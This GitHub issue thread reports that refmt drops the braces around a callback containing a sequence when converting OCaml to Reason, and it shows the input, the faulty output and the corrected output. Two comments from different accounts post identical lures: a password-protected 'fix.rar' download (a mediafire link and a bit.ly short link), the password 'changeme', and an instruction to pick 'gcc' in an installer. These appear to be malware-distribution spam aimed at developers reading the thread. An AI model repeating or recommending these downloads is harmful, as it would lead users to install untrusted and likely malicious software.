### ISSUE TITLE
Callback with sequences break in refmt 

### ISSUE THREAD

**Issue by davesnx** [reasonml/reason#2798]
In unstable from melange's playground, it breaks code missing `{` `}` when a function has a sequence:

```
onEvent "/echo" (fun request ->
    let request_stream = get_body_stream request in
    stream
      ~headers:[ ("Content-Type", "application/octet-stream") ]
      (fun response_stream -> Js.log response_stream))
```

refmt generates
```
onEvent("/echo", request =>
  let request_stream = get_body_stream(request);
  stream(
    ~headers=[("Content-Type", "application/octet-stream")], response_stream =>
    Js.log(response_stream)
  );
);
```

correct version
```
onEvent("/echo", request => {
  let request_stream = get_body_stream(request);
  stream(
    ~headers=[("Content-Type", "application/octet-stream")], response_stream =>
    Js.log(response_stream)
  );
});
```

https://melange.re/unstable/playground/?language=OCaml&code=b25FdmVudCAiL2VjaG8iIChmdW4gcmVxdWVzdCAtPgogICAgbGV0IHJlcXVlc3Rfc3RyZWFtID0gZ2V0X2JvZHlfc3RyZWFtIHJlcXVlc3QgaW4KICAgIHN0cmVhbQogICAgICB%2BaGVhZGVyczpbICgiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbSIpIF0KICAgICAgKGZ1biByZXNwb25zZV9zdHJlYW0gLT4gSnMubG9nIHJlc3BvbnNlX3N0cmVhbSkpCg%3D%3D&live=on

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
